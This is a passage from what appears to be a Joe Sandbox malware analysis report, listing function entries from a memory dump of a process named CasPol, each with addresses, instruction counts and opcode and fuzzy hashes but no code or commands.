                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8501D130B202210BDB69E56ED494B2FB7DBDFC9B20F108439E90AC7380DE61DC424395
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06243BB7 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1f36f7d0330896cd9a8c3437f3500f842ce4b3c8d6c52531ba0cb221514b9182
                                                                                                                                                                                                                                                    • Instruction ID: 424468b681c73f5dd31b71263a73be6ca0dd033214e5e2f3c5d60e927bd8af35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f36f7d0330896cd9a8c3437f3500f842ce4b3c8d6c52531ba0cb221514b9182
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401B536B206244FDB69D67DD8243BE77EAAB88310F04413AD906E7344DE659C028790
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624A308 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3072915a7d81703e3cdd939a1c2178b8043b3b52d9785c5f2cc9f4f150dcb014
                                                                                                                                                                                                                                                    • Instruction ID: ee1acd66f09c2408106a2cbe3a130a1975c6ff11a096c595044c39b67de5f14e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3072915a7d81703e3cdd939a1c2178b8043b3b52d9785c5f2cc9f4f150dcb014
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4001A430B602250FDB95EA2DE454B6E7BDAE78A750F108838E90AC7354EE65DC4287D4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624C7C8 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1ef5631a29894166ff7899b36145d3208fa1d30af46f100cfb96cd3a278d3980
                                                                                                                                                                                                                                                    • Instruction ID: 1fcb53517fa85e2d5e314c2e673a0cf9be06bcdb2522d6e20d9639ff19a9835d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ef5631a29894166ff7899b36145d3208fa1d30af46f100cfb96cd3a278d3980
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27F0A732F31228ABDB186969E8055EAB77AE784354F004429EE01A7340DA726C1087C0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06246469 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5fff228ee20ac56fb185fc2bd62cbcba93c6c8d40236aec3a0a38f13bc079c88
                                                                                                                                                                                                                                                    • Instruction ID: a4ce70281ae086be5d1e3eb5cf25a5f4f6adc312f46643b6747e4982e015750e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fff228ee20ac56fb185fc2bd62cbcba93c6c8d40236aec3a0a38f13bc079c88
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56F0657096A2855ADF61EAB4CA5579A7BA4EB03204F2448D6D804CB142D236D9058341
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06244A59 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 458e4c3f970d1770dabaaee4c4ec6d80cfa60b2cbcb86bb557e3fd4901abae2d
                                                                                                                                                                                                                                                    • Instruction ID: c9ee0bc3febfbc47e01de1efe4a8a910391d824e47ab2df5855095f3e3335ab7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 458e4c3f970d1770dabaaee4c4ec6d80cfa60b2cbcb86bb557e3fd4901abae2d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61F0FE31A24129DFDB54EF94E869BADBBB2FF48705F200129E402A7384CB741D41CB85
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06246478 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
                                                                                                                                                                                                                                                    • Instruction ID: 731d101470b4df46afbf5d2cf05787efec4c6b8d4288d58de5eccb92a98f92b2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51ab8b9167b177b3b9488c634abfd5cd36c5352d43edae72c8507f2690bd4af0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BE0C270E20209ABDF60EEB0CA0575AB3ADE702244F2088A5DC08C7201E272DA058380
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%